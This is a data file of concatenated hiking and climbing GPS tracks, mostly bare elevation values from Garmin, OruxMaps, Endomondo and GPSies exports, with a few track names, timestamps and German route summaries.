1730,7m/h</p><p>Sink-Geschw.: -591,3m/h</p><p>Aufstieg: 88m</p><p>Abstieg: -899m</p><p>Steigzeit: 00:03</p><p>Sinkzeit: 01:31</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2044.62 + + + +2032.66 + + + +2026.01 + + + +1991.23 + + + +1971.14 + + + +1946.58 + + + +1898.55 + + + +1880.12 + + + +1855.15 + + + +1852.57 + + + +1845.26 + + + +1837.64 + + + +1836.76 + + + +1820.13 + + + +1816.62 + + + +1784.65 + + + +1777.01 + + + +1771.16 + + + +1778.14 + + + +1753.26 + + + +1736.24 + + + +1732.01 + + + +1709.11 + + + +1695.14 + + + +1679.63 + + + +1681.14 + + + +1672.26 + + + +1653.5 + + + +1648.52 + + + +1643.63 + + + +1619.57 + + + +1596.14 + + + +1587.76 + + + +1565.29 + + + +1559.51 + + + +1574.1 + + + +1571.36 + + + +1528.64 + + + +1511.99 + + + +1494.96 + + + +1481.17 + + + +1479.23 + + + +1475.77 + + + +1470.15 + + + +1460.7 + + + +1450.76 + + + +1447.2 + + + +1487.76 + + + +1475.95 + + + +1440.38 + + + +1389.14 + + + +1386.14 + + + +1355.17 + + + +1302.74 + + + +1285.14 + + + +1286.02 + + + +1282.17 + + + +1264.51 + + + +1255.01 + + + +1249.13 + + + +1246.63 + + + +1236.89 + + + +1238.01 + + + +1235.79 + + + +1229.28 + + + +1230.03 + +" +" + + + + + + +Garmin International + + +2015-06-26 19:32:35 + + + + + + +1554.85 + + + +1567.99 + + + +1588.43 + + + +1606.56 + + + +1638.18 + + + +1656.6 + + + +1675.01 + + + +1716.25 + + + +1740.64 + + + +1776.18 + + + +1803.65 + + + +1858.58 + + + +1820.76 + + + +1809.8 + + + +1790.17 + + + +1753.58 + + + +1737.96 + + + +1750.02 + + + +1694.74 + + + +1688.05 + + + +1710.9 + + + +1753.56 + + + +1788.81 + + + +1792.09 + + + +1809.55 + + + +1782.96 + + + +1756.93 + + + +1705.65 + + + +1673.04 + + + +1633.79 + + + +1618.6 + + + +1598.47 + + + +1561.52 + + + +1545.96 + + + +1548.05 + + + +1548.54 + + + +1550.35 + + + +1539.78 + + + +1501.15 + + + +1484.71 + + + +1474.5 + + + +1461.02 + + + +1441.75 + + + +1424.05 + + + +1404.72 + + + +1355.26 + + + +1332.77 + + + +1309.39 + + + +1295.8 + + + +1280.64 + + + +1227.09 + + + +1215.43 + + + +1206.31 + + + +1195.76 + + + +1173.85 + + + +1169.01 + + + +1169.98 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + +Polar + + + + + + + + +710.0 + + + +692.0 + + + +684.0 + + + +703.0 + + + +708.0 + + + +719.0 + + + +729.0 + + + +741.0 + + + +754.0 + + + +767.0 + + + +778.0 + + + +790.0 + + + +791.0 + + + +807.0 + + + +824.0 + + + +824.0 + + + +838.0 + + + +854.0 + + + +898.0 + + + +936.0 + + + +963.0 + + + +1013.0 + + + +1043.0 + + + +1082.0 + + + +1160.0 + + + +1196.0 + + + +1252.0 + + + +1314.0 + + + +1354.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-04-25 18:07:46 + + + + + + +915.08 + + + +915.15 + + + +913.73 + + + +915.26 + + + +915.58 + + + +915.35 + + + +913.41 + + + +910.84 + + + +907.21 + + + +901.24 + + + +900.32 + + + +895.23 + + + +894.49 + + + +893.24 + + + +891.93 + + + +889.37 + + + +897.16 + + + +883.05 + + + +887.68 + + + +876.95 + + + +883.58 + + + +894.38 + + + +897.2 + + + +897.14 + + + +911.03 + + + +892.68 + + + +897.14 + + + +914.49 + + + +923.18 + + + +932.36 + + + +941.8 + + + +941.14 + + + +940.77 + + + +932.9 + + + +912.77 + + + +889.78 + + + +894.47 + + + +899.58 + + + +897.6 + + + +893.07 + + + +908.36 + + + +920.33 + + + +934.34 + + + +944.04 + + + +946.27 + + + +947.17 + + + +944.1 + + + +934.28 + + + +931.21 + + + +922.95 + + + +918.43 + + + +916.12 + + + +918.89 + + + +914.56 + + + +912.89 + + + +920.74 + + + +915.86 + +" +" + + + + + + +Garmin International + + +03-OKT-13 12:34:00 PM + + + + + +929.25 + + + +919.64 + + + +911.95 + + + +917.72 + + + +931.17 + + + +940.31 + + + +934.06 + + + +933.58 + + + +933.58 + + + +934.06 + + + +937.9 + + + +941.27 + + + +966.74 + + + +966.74 + + + +966.74 + + + +967.22 + + + +970.59 + + + +979.24 + + + +980.68 + + + +989.81 + + + +992.22 + + + +1000.39 + + + +1006.16 + + + +1007.12 + + + +1008.08 + + + +1010.0 + + + +1010.0 + + + +1010.48 + + + +1011.44 + + + +1012.41 + + + +1013.37 + + + +1014.33 + + + +1019.62 + + + +1024.42 + + + +1030.67 + + + +1033.55 + + + +1236.87 + + + +1258.98 + + + +1308.97 + + + +1324.83 + + + +1343.1 + + + +1385.4 + + + +1375.78 + + + +1358.0 + + + +1422.89 + + + +1428.18 + + + +1451.73 + +" +" + + + + + + +Garmin International + + + +Aktueller Track: 28 FEB 2015 11:42 + + + + + + +163.56 + + + +210.71875 + + +210.34765625 + + +209.74609375 + + +207.3 + + + +207.3 + + + +205.38 + + + +204.42 + + + +204.42 + + + +204.42 + + + +204.42 + + + +202.98 + + + +204.42 + + + +205.38 + + + +205.86 + + + +206.34 + + + +206.34 + + + +205.38 + + + +206.34 + + + +206.34 + + + +207.78 + + + +207.78 + + + +208.74 + + + +210.19 + + + +213.07 + + + +219.32 + + + +228.93 + + + +230.85 + + + +229.89 + + + +231.33 + + + +233.74 + + + +205.1796875 + + +243.98046875 + + +245.4375 + + +239.6796875 + + +245.375 + + +243.61328125 + + +222.984375 + + +227.515625 + + +233.125 + + +230.2109375 + + +220.27734375 + + +218.921875 + + +218.828125 + + +224.8671875 + + +214.27734375 + + +211.44140625 + + +208.79296875 + + +207.01953125 + + +204.8828125 + + +203.6015625 + + +203.10546875 + + +203.8203125 + + +203.64453125 + + +203.96875 + + +204.41015625 + + +205.125 + + +205.23046875 + + +205.75390625 + + +206.0390625 + + +207.93359375 + + +206.9453125 + + +244.79 + + + +249.12 + + + +249.6 + + + +249.12 + + + +247.68 + + + +245.27 + + + +243.83 + + + +238.06 + + + +234.7 + + + +224.12 + + + +220.28 + + + +242.39 + +" +" + + +osset + + +1215.78 + + +1218.99 + + +1225.44 + + +1234.05 + + +1249.36 + + +1255.0 + + +1266.35 + + +1268.98 + + +1277.36 + + +1287.09 + + +1298.14 + + +1313.95 + + +1345.56 + + +1397.59 + + +1449.93 + + +1467.35 + + +1475.89 + + +1541.36 + + +1526.58 + + +1469.46 + + +1450.92 + + +1394.24 + + +1369.38 + + +1325.47 + + +1300.59 + + +1289.45 + + +1278.07 + + +1260.32 + + +1251.81 + + +1239.07 + + +1231.12 + + +1225.99 + + +1217.41 + + +1218.1 + + +1214.2 + + +1218.51 + + +1211.26 + + +1209.4 + + +1209.17 + + +1208.0 + + +1207.34 + + +1194.09 + + +1194.17 + + +1191.69 + + +1187.96 + + +1188.68 + + +1187.58 + + +1187.42 + + +1184.2 + + +1179.66 + + +1179.27 + + +1181.0 +" +" + + + +Marcin Michalik + + + + +Endomondo + + +http://www.endomondo.com/ + +endomondo +CLIMBING + + + + + +531.7 + + + +544.0 + + + +538.0 + + + +541.2 + + + +545.1 + + + +548.6 + + + +562.9 + + + +556.1 + + + +571.7 + + + +600.5 + + + +583.5 + + + +580.4 + + + +576.5 + + + +586.6 + + + +590.0 + + + +602.4 + + + +619.8 + + + +656.4 + + + +630.1 + + + +625.3 + + + +615.6 + + + +625.9 + + + +602.0 + + + +615.3 + + + +622.8 + + + +644.1 + + + +652.3 + + + +682.0 + + + +690.9 + + + +678.8 + + + +757.3 + + + +728.6 + + + +726.6 + + + +776.0 + + + +762.4 + + + +772.5 + + + +806.6 + + + +815.2 + + + +829.4 + + + +863.1 + + + +854.5 + + + +826.3 + + + +809.6 + + + +783.2 + + + +762.4 + + + +745.4 + + + +710.1 + + + +690.8 + + + +689.5 + + + +662.8 + + + +657.7 + + + +630.8 + + + +597.6 + + + +578.6 + + + +575.4 + + + +572.6 + + + +549.1 + + + +547.8 + + + +534.2 + + + +525.8 + + + +533.1 + + + + + + + + +" +" + + + + + + +CompeGPS TEAM, SL + + + +Riffelseeweg +Die Wasseroberfläche des Riffelsee ist meist ruhig. Ideal f_rs Fotoshooting. In dieser urt_mlichen Alpenlandschaft lässt sich der Alltag im Tal unten vergessen. Das Lichtspiel mit den Wolken am Himmel, der weite Horizont, der Blick zu den h_chsten Bergen des ganzen Alpenbogens _ das alles sagt: Ich komme wieder. Ganz sicher.<br /><br /> +<ul> +<li>Riffelsee: das sch_nste Fotosujet mit Matterhornspiegelung</li> +<li>f_r Kinder ab 4 Jahren</li> +<li>am Riffelhorn: Kletterrouten f_r K_nner</li> +<li>reiche Alpenflora</li> +<li>je nach Jahreszeit: Wild zum Beobachten (Steinb_cke im Gebiet Gaggenhaupt)</li> +</ul> + + + +3056.8 + + + +2926.4 + + + +2925.6 + + + +2904.1 + + + +2885.7 + + + +2883.8 + + + +2877.3 + + + +2814.1 + + +2802.3 + + +2786.8 + + +2781.3 + + +2773.2 + + +2766.0 + + +2765.2 + + +2761.7 + + +2744.8 + + +2742.8 + + +2736.2 + + +2701.6 + + +2694.9 + + +2655.4 + + +2612.7 + + +2587.5 + + +2568.3 + + +2567.9 + + +2578.4 + + +2580.3 + + +2592.2 + + +2591.6 + + +2596.0 + + +2588.2 + + +2589.4 + + +2583.3 + + +2580.9 + + +2577.5 + + +2577.0 + + +2583.9 + + +2578.7 +" +" + + +Mono Lake South Tufa and Navy Beach + +360gps + +360gps on GPSies.com +GPSiesUserOnWeb + + +Mono Lake South Tufa and Navy Beach on GPSies.com +trackOnWeb + + +round trip +9.0 +2525.708602173442 +1948.0 +1956.0 +10.0 + +Mono Lake South Tufa and Navy Beach on GPSies.com + +trackOnWeb + + +1956.0 + + + +1956.0 + + + +1954.0 + + + +1952.0 + + + +1949.0 + + + +1948.0 + + + +1949.0 + + + +1948.0 + + + +1949.0 + + + +1949.0 + + + +1949.0 + + + +1949.0 + + + +1949.0 + + + +1949.0 + + + +1949.0 + + + +1950.0 + + + +1950.0 + + + +1950.0 + + + +1950.0 + + + +1950.0 + + + +1949.0 + + + +1949.0 + + + +1949.0 + + + +1950.0 + + + +1949.0 + + + +1950.0 + + + +1950.0 + + + +1950.0 + + + +1951.0 + + + +1953.0 + + + +1954.0 + + + +1954.0 + + + +1955.0 + + + +1955.0 + +" +" + + +Lance Sud de Malissard + + + + + +OruxMaps + + + +Lance Sud de Malissard +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Lance Sud de Malissard</h2><br /><p>Startzeit: 11/05/2015 10:09</p><p>Zielzeit: 11/05/2015 13:00</p><p>Strecke: 6,3km (02:51)</p><p>Bewegungszeit: 01:53</p><p>Ø-Geschwindigkeit: 2,2km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 7,1km/h</p><p>Minimale Höhe: 990m</p><p>Maximale Höhe: 2044m</p><p>Steig-Geschw.: 456,2m/h</p><p>Sink-Geschw.: -226,6m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -82m</p><p>Steigzeit: 02:24</p><p>Sinkzeit: 00:21</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1031.63 + + + +1004.55 + + + +999.8 + + + +1000.38 + + + +1009.79 + + + +1028.88 + + + +1055.41 + + + +1052.37 + + + +1057.87 + + + +1084.47 + + + +1143.38 + + + +1150.87 + + + +1159.31 + + + +1186.76 + + + +1186.38 + + + +1189.89 + + + +1189.26 + + + +1206.4 + + + +1202.35 + + + +1207.76 + + + +1210.41 + + + +1218.1 + + + +1231.88 + + + +1236.49 + + + +1238.78 + + + +1262.12 + + + +1266.01 + + + +1280.87 + + + +1308.11 + + + +1327.38 + + + +1329.38 + + + +1347.91 + + + +1364.89 + + + +1387.12 + + + +1399.1 + + + +1407.38 + + + +1417.5 + + + +1442.25 + + + +1467.76 + + + +1481.86 + + + +1484.84 + + + +1476.83 + + + +1530.32 + + + +1533.66 + + + +1559.29 + + + +1582.98 + + + +1605.9 + + + +1601.21 + + + +1628.63 + + + +1623.01 + + + +1631.88 + + + +1646.87 + + + +1672.37 + + + +1664.35 + + + +1680.23 + + + +1712.78 + + + +1737.78 + + + +1743.92 + + + +1768.71 + + + +1783.9 + + + +1800.38 + + + +1815.33 + + + +1835.11 + + + +1864.84 + + + +1883.88 + + + +1887.39 + + + +1903.38 + + + +1974.5 + + + +2010.53 + + + +2041.85 + + + +2044.38 + +" +" + + +Gaviola + + + + + +OruxMaps + + + +Gaviola +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Gaviola</h2><br /><p>Startzeit: 08/17/2015 14:15</p><p>Zielzeit: 08/17/2015 15:29</p><p>Strecke: 2,1km (01:13)</p><p>Bewegungszeit: 00:38</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 3,3km/h</p><p>Max. Geschwindigkeit: 5,8km/h</p><p>Minimale Höhe: 2613m</p><p>Maximale Höhe: 3017m</p><p>Steig-Geschw.: 389,9m/h</p><p>Sink-Geschw.: -73,8m/h</p><p>Aufstieg: 400m</p><p>Abstieg: -9m</p><p>Steigzeit: 01:01</p><p>Sinkzeit: 00:07</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2615.31 + + + +2622.35 + + + +2615.42 + + + +2617.5 + + + +2617.86 + + + +2621.89 + + + +2622.04 + + + +2632.38 + + + +2636.87 + + + +2643.33 + + + +2648.38 + + + +2657.16 + + + +2660.23 + + + +2682.88 + + + +2704.29 + + + +2708.88 + + + +2718.89 + + + +2726.82 + + + +2740.38 + + + +2757.28 + + + +2779.88 + + + +2782.23 + + + +2797.41 + + + +2819.42 + + + +2840.5 + + + +2850.33 + + + +2874.38 + + + +2877.51 + + + +2907.38 + + + +2917.39 + + + +2936.88 + + + +2962.4 + + + +2996.85 + + + +3017.26 + +" +" + + +gottertli 2018-03 + + + + + + +gottertli 2018-03 + + + +437.4 + + +439.3999856651063 + + +464.1999229357155 + + +479.0999110959082 + + +510.5740824982823 + + +509.02927862144406 + + +538.2 + + +549.4999577291021 + + +554.7214073768222 + + +569.6999749226607 + + +569.9557117817975 + + +579.700038827597 + + +592.8 + + +599.5000971077948 + + +610.3999264443352 + + +623.6000214680271 + + +632.8998227965031 + + +652.7999219265442 + + +668.1521118705778 + + +712.8999434532875 + + +719.8999934847567 + + +724.7340563172894 + + +736.6493288164438 + + +747.8702934009364 + + +762.7000412525525 + + +774.6999995138465 + + +803.5999660258179 + + +848.8998553744841 + + +870.2999949126216 + + +914.0001145427286 + + +934.9898790063938 + + +958.0998869136927 + + +995.3002116572903 + + +1043.5 + + +1050.8001079207272 + + +1060.2728846249213 + + +1105.6000998743848 + + +1133.6999433206227 + + +1189.8 + + +1198.8 + + +1221.1056208287357 + + +1231.8 + + +1244.1948823040984 + + +1256.6072538610538 + + +1259.8670857723198 + + +1275.199854349075 + + +1287.8000333888588 + + +1310.2925811368073 + + +1316.862384626651 + + +1328.9257517207702 + + +1330.4058545615146 + + +1342.2 + + +1350.4999464740858 + + +1373.4000152222243 + + +1376.6001741434604 + + +1341.7999726647276 + + +1278.1999765603111 + + +1270.6000651541203 + + +1236.8999291065184 + + +1207.1000169742981 + + +1196.9934783160888 + + +1189.699864983555 + + +1166.3999340513399 + + +1162.1 + + +1157.7 + + +1150.4998275567677 + + +1135.5 + + +1141.4 +" +" + + + + + + + +2016-07-23 14:33:09 + + + +2198.19 + + +2197.71 + + +2199.63 + + +2201.56 + + +2201.56 + + +2201.08 + + +2201.08 + + +2200.59 + + +2202.52 + + +2202.52 + + +2197.23 + + +2188.58 + + +2181.37 + + +2182.33 + + +2193.39 + + +2208.29 + + +2214.53 + + +2217.42 + + +2225.11 + + +2251.06 + + +2254.91 + + +2257.79 + + +2260.2 + + +2261.64 + + +2263.08 + + +2265.96 + + +2270.29 + + +2272.69 + + +2275.58 + + +2280.38 + + +2285.67 + + +2289.52 + + +2290.96 + + +2293.84 + + +2297.69 + + +2301.05 + + +2305.86 + + +2309.22 + + +2317.4 + + +2319.32 + + +2325.57 + + +2337.1 + + +2339.51 + + +2350.56 + + +2372.19 + + +2373.15 + + +2376.04 + + +2376.52 + + +2380.84 + + +2387.57 + + +2385.65 + + +2404.39 + + +2426.99 + + +2428.43 + + +2436.6 + + +2448.62 +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +20.02.2016, 4.97km (autom. speichern) + + + +735.4 + + + +782.53 + + + +798.13 + + + +814.39 + + + +840.62 + + + +842.82 + + + +875.23 + + + +885.58 + + + +911.49 + + + +923.33 + + + +934.75 + + + +938.33 + + + +991.23 + + + +1006.4 + + + +1035.89 + + + +1041.04 + + + +1059.96 + + + +1064.21 + + + +1099.81 + + + +1115.34 + + + +1120.0 + + + +1172.77 + + + +1178.96 + + + +1202.64 + + + +1224.03 + + + +1231.11 + + + +1239.06 + + + +1257.66 + + + +1287.09 + + + +1345.53 + + + +1367.44 + + + +1393.3 + + + +1403.5 + + + +1415.99 + + + +1426.74 + + + +1428.66 + + + +1440.19 + + + +1439.04 + + + +1443.09 + + + +1440.11 + + + +1442.06 + + + +1440.3 + + + +1435.46 + + + +1435.05 + + + +1436.32 + + + +1435.62 + + + +1440.16 + + + +1441.19 + + + +1448.58 + + + +1441.37 + +" +" + + + + + + +Garmin Connect + + +Borgio Wandern +Zustieg zum Klettergarten Rocce dell'Orera + + + +255.39999389648438 + + + + + + +247.60000610351562 + + + + + + +244.39999389648438 + + + + + + +234.1999969482422 + + + + + + +223.60000610351562 + + + + + + +203.60000610351562 + + + + + + +184.39999389648438 + + + + + + +124.19999694824219 + + + + + + +103.80000305175781 + + + + + + +88.19999694824219 + + + + + + +69.80000305175781 + + + + + + +60.0 + + + + + + +46.400001525878906 + + + + + + +30.200000762939453 + + + + + + +15.0 + + + + + + +12.399999618530273 + + + + + + +13.0 + + + + + + +11.600000381469727 + + + + + + +12.0 + + + + + + +11.0 + + + + + + +11.800000190734863 + + + + + + +12.0 + + + + + + +12.0 + + + + + + +12.399999618530273 + + + + + + +15.199999809265137 + + + + + " +" + + + + + + +Garmin International + + +2015-07-21 08:56:57 + + + + + + +825.93 + + + +827.44 + + + +828.36 + + + +830.2 + + + +830.64 + + + +831.02 + + + +836.03 + + + +852.17 + + + +864.4 + + + +879.45 + + + +882.49 + + + +888.15 + + + +896.3 + + + +897.33 + + + +897.78 + + + +899.85 + + + +906.29 + + + +932.05 + + + +952.85 + + + +968.97 + + + +986.49 + + + +998.44 + + + +1021.48 + + + +1025.64 + + + +1027.74 + + + +1035.12 + + + +1058.26 + + + +1082.2 + + + +1091.3 + + + +1108.36 + + + +1112.13 + + + +1118.5 + + + +1123.91 + + + +1131.22 + + + +1136.22 + + + +1141.14 + + + +1142.24 + + + +1146.68 + + + +1147.67 + + + +1156.8 + + + +1173.23 + + + +1179.67 + + + +1185.83 + + + +1196.64 + + + +1200.37 + + + +1201.65 + + + +1207.95 + + + +1214.05 + + + +1222.83 + + + +1232.78 + + + +1250.33 + + + +1267.08 + + + +1272.79 + + + +1326.75 + + + +1367.44 + + + +1383.93 + + + +1405.89 + + + +1447.85 + + + +1457.55 + + + +1486.8 + + + +1511.2 + + + +1553.88 + + + +1578.16 + + + +1603.29 + + + +1636.85 + + + +1694.54 + + + +1806.13 + + + +1840.92 + +" +" + + + + + + + +Linie + + + +956.3 + + +965.7 + + +981.6 + + +984.4 + + +998.5 + + +1021.5 + + +1055.5 + + +1078.1 + + +1113.1 + + +1140.0 + + +1138.9 + + +1153.6 + + +1195.5 + + +1218.3 + + +1217.9 + + +1214.7 + + +1216.6 + + +1237.7 + + +1236.1 + + +1248.0 + + +1264.6 + + +1261.6 + + +1278.9 + + +1279.2 + + +1282.9 + + +1291.0 + + +1312.6 + + +1314.8 + + +1349.6 + + +1356.3 + + +1375.4 + + +1370.8 + + +1385.3 + + +1385.1 + + +1397.1 + + +1411.1 + + +1434.3 + + +1448.0 + + +1465.7 + + +1476.6 + + +1494.4 + + +1509.0 + + +1522.7 + + +1535.6 + + +1542.7 + + +1555.9 + + +1563.2 + + +1583.7 +" +" + + + + + + +Garmin International + + +2015-04-14 20:08:51 + + + + + + +826.05 + + + +827.2 + + + +826.29 + + + +833.08 + + + +837.19 + + + +857.2 + + + +867.16 + + + +877.32 + + + +893.34 + + + +900.38 + + + +918.61 + + + +925.67 + + + +934.25 + + + +955.58 + + + +944.73 + + + +937.38 + + + +929.63 + + + +917.89 + + + +905.11 + + + +893.65 + + + +882.84 + + + +864.57 + + + +855.62 + + + +847.55 + + + +831.01 + + + +823.17 + + + +817.79 + + + +828.94 + + + +840.49 + + + +853.91 + + + +866.14 + + + +879.89 + + + +889.46 + + + +891.93 + + + +900.33 + + + +894.99 + + + +892.53 + + + +887.96 + + + +880.41 + + + +874.5 + + + +870.24 + + + +865.99 + + + +860.75 + + + +851.36 + + + +849.56 + + + +849.76 + + + +848.55 + + + +843.16 + + + +841.55 + + + +841.2 + + + +839.78 + + + +835.2 + + + +831.34 + + + +832.29 + + + +828.35 + + + +834.77 + + + +835.86 + + + +833.02 + +" +" + + +2016-07-24T08:41:25+0200 + + +1460.0 + +1462.1305241679938 + +1464.9881208521253 + +1469.3001563241626 + +1477.95277546878 + +1482.7516451341346 + +1492.318162568008 + +1530.6523479096597 + +1536.7921476559031 + +1552.6956171611735 + +1575.751817173198 + +1583.862056123387 + +1593.997848860574 + +1608.1770994709582 + +1629.2077486678859 + +1646.6555034235512 + +1655.5407493406624 + +1682.4476969521672 + +1708.2232183166907 + +1723.362096943849 + +1720.4682751619855 + +1756.4482511902895 + +1762.6455775459526 + +1757.504377230836 + +1763.5267423434664 + +1760.8826840098757 + +1765.9032749561632 + +1789.8315333190296 + +1803.5598307464968 + +1815.2561394569846 + +1827.0862420515184 + +1849.3049905125429 + +1857.9705488273416 + +1867.4287220002923 + +1887.076148946134 + +1912.9837104494725 + +1921.4652760517638 + +1936.2508329401985 + +1963.5728260692542 + +2001.5445004399717 + +2042.0757673409987 + +2047.6819153983197 + +2059.929022827194 + +2070.2193482601215 + +2082.6395860175144 + +2121.628689699362 + +2140.7643682637145 + +2141.7977404710973 + +2161.3510392509606 + +2178.3930158357034 + +2196.682867070238 + +2217.1489615094556 + +2226.128938581397 + +2256.6970219396107 + +2305.1690883718384 + +2312.9398643401637 + +2315.93070436358 + +2327.861839273584 + +2343.6462821215728 + +2345.2035553326045 + +2350.9335501236087 + +2352.9647349888087 + +2359.337132051706 + +2388.3990929808188 + +2444.3675601514265 + +2456.4462188822745 + +2474.2586498870855 + +2483.303475262201 + +2522.436905888874 + +2532.8537955288875 + +2537.548224359725 + +2534.1900627481145 + +2525.068730364287 + +2511.136338678157 + +2496.1869778415085 + +2480.4485051575407 + +2456.8844196308405 + +2448.094663667162 + +2448.0102607831163" +" + + + + + + + +LOPASS + + + +1544.6 + + +1543.4 + + +1545.1 + + +1543.0 + + +1538.7 + + +1540.9 + + +1574.8 + + +1578.3 + + +1591.6 + + +1599.8 + + +1620.1 + + +1627.9 + + +1634.4 + + +1637.5 + + +1652.4 + + +1668.4 + + +1680.0 + + +1742.7 + + +1757.5 + + +1773.2 + + +1785.4 + + +1798.8 + + +1806.5 + + +1820.6 + + +1835.3 + + +1844.9 + + +1856.7 + + +1880.3 + + +1887.0 + + +1895.2 + + +1938.5 + + +1960.3 + + +2009.6 + + +2023.3 + + +2002.8 + + +1999.6 + + +2000.3 + + +2013.8 + + +2021.0 + + +2037.5 + + +2063.5 + + +2067.9 + + +2077.2 + + +2075.5 + + +2083.0 + + +2137.5 + + +2169.3 + + +2173.0 + + +2215.2 + + +2223.2 + + +2240.4 + + +2251.7 + + +2265.6 + + +2269.6 + + +2278.0 + + +2288.5 + + +2303.7 + + +2333.9 + + +2316.7 + + +2371.9 + + +2403.5 + + +2425.8 + + +2439.7 + + +2444.8 + + +2447.3 + + +2452.8 + + +2462.4 + + +2470.6 + + +2471.6 + + +2487.9 + + +2499.3 + + +2513.0 + + +2524.1 + + +2564.5 + + +2563.7 + + +2577.3 + + +2588.0 + + +2615.8 + + +2622.3 + + +2613.7 + + +2627.7 + + +2627.3 + + +2639.5 + + +2641.4 + + +2667.2 + + +2677.9 + + +2686.5 + + +2692.9 +" +" + + + + + + +Garmin International + + + +2017-03-16 16:00:00 + + + + + + +537.03 + + + +630.76 + + + +629.32 + + + +630.28 + + + +630.76 + + + +633.17 + + + +641.82 + + + +649.51 + + + +658.16 + + + +660.08 + + + +664.41 + + + +666.33 + + + +690.84 + + + +694.69 + + + +703.34 + + + +710.07 + + + +720.65 + + + +725.45 + + + +730.74 + + + +734.58 + + + +744.68 + + + +746.6 + + + +750.45 + + + +752.85 + + + +757.18 + + + +759.1 + + + +766.31 + + + +772.56 + + + +783.13 + + + +784.57 + + + +796.59 + + + +800.92 + + + +815.82 + + + +816.78 + + + +823.03 + + + +863.88 + + + +878.78 + + + +891.28 + + + +918.68 + + + +926.85 + + + +958.09 + + + +985.97 + + + +1003.75 + + + +1012.89 + + + +1030.19 + + + +1031.63 + + + +1033.55 + + + +1032.11 + + + +1033.55 + + + +1056.15 + + + +1057.59 + + + +1063.36 + + + +1093.16 + + + +1119.11 + + + +1124.88 + + + +1136.9 + + + +1187.85 + + + +1204.67 + + + +1229.18 + + + +1238.32 + + + +1261.39 + + + +1268.12 + + + +1280.61 + + + +1288.3 + +" +" + + +Habart + + + + + +OruxMaps + + + +Habart +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Habart</h2><br /><p>Startzeit: 07/03/2015 09:09</p><p>Zielzeit: 07/03/2015 11:38</p><p>Strecke: 3,5km (02:29)</p><p>Bewegungszeit: 01:18</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,7km/h</p><p>Max. Geschwindigkeit: 6,5km/h</p><p>Minimale Höhe: 1618m</p><p>Maximale Höhe: 2301m</p><p>Steig-Geschw.: 417,3m/h</p><p>Sink-Geschw.: -540,4m/h</p><p>Aufstieg: 714m</p><p>Abstieg: -293m</p><p>Steigzeit: 01:42</p><p>Sinkzeit: 00:32</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1618.0 + + + +1618.9 + + + +1636.99 + + + +1639.0 + + + +1653.87 + + + +1665.99 + + + +1673.24 + + + +1687.25 + + + +1704.75 + + + +1708.85 + + + +1741.38 + + + +1770.39 + + + +1793.99 + + + +1804.97 + + + +1819.83 + + + +1831.37 + + + +1847.8 + + + +1852.89 + + + +1891.58 + + + +1932.9 + + + +1960.24 + + + +1970.27 + + + +1986.99 + + + +1998.43 + + + +2011.75 + + + +2040.31 + + + +2068.46 + + + +2088.46 + + + +2139.44 + + + +2162.8 + + + +2161.47 + + + +2165.6 + + + +2205.86 + + + +2277.5 + + + +2289.25 + + + +2301.34 + + + +2285.49 + + + +2252.37 + + + +2245.49 + + + +2206.9 + + + +2167.87 + + + +2182.03 + + + +2149.6 + + + +2096.87 + + + +2070.04 + + + +2039.9 + + + +2016.13 + +" +" + + +Arita-Tour + +fuemm63 + +fuemm63 on GPSies.com +GPSiesUserOnWeb + + +Arita-Tour on GPSies.com +trackOnWeb + + +one-way trip +90.0 +5461.431078675756 +58.0 +138.0 +57.0 + +Arita-Tour on GPSies.com + +trackOnWeb + + +63.0 + + + +63.0 + + + +63.0 + + + +60.0 + + + +58.0 + + + +68.0 + + + +69.0 + + + +70.0 + + + +66.0 + + + +65.0 + + + +65.0 + + + +71.0 + + + +71.0 + + + +71.0 + + + +71.0 + + + +82.0 + + + +98.0 + + + +100.0 + + + +93.0 + + + +83.0 + + + +79.0 + + + +79.0 + + + +79.0 + + + +83.0 + + + +82.0 + + + +86.0 + + + +87.0 + + + +92.0 + + + +96.0 + + + +97.0 + + + +96.0 + + + +102.0 + + + +104.0 + + + +110.0 + + + +107.0 + + + +111.0 + + + +119.0 + + + +124.0 + + + +138.0 + + + +137.0 + + + +133.0 + + + +135.0 + + + +129.0 + + + +118.0 + + + +107.0 + + + +104.0 + + + +104.0 + + + +111.0 + + + +101.0 + + + +99.0 + + + +96.0 + +" +" + + + + + + + +Track 23.10.2015 - Hundwiler Höhi + + + +779.77 + + +779.77 + + +786.98 + + +788.9 + + +789.86 + + +796.59 + + +809.09 + + +821.58 + + +887.43 + + +908.1 + + +911.47 + + +952.32 + + +988.85 + + +1013.37 + + +1032.11 + + +1046.05 + + +1057.59 + + +1062.87 + + +1063.84 + + +1092.68 + + +1090.27 + + +1103.73 + + +1090.75 + + +1093.16 + + +1113.34 + + +1108.54 + + +1109.5 + + +1125.84 + + +1166.22 + + +1181.12 + + +1188.81 + + +1190.73 + + +1199.86 + + +1208.03 + + +1243.6 + + +1248.41 + + +1256.58 + + +1265.71 + + +1287.34 + + +1299.84 + + +1292.63 + + +1298.4 + + +1291.67 + + +1298.4 + 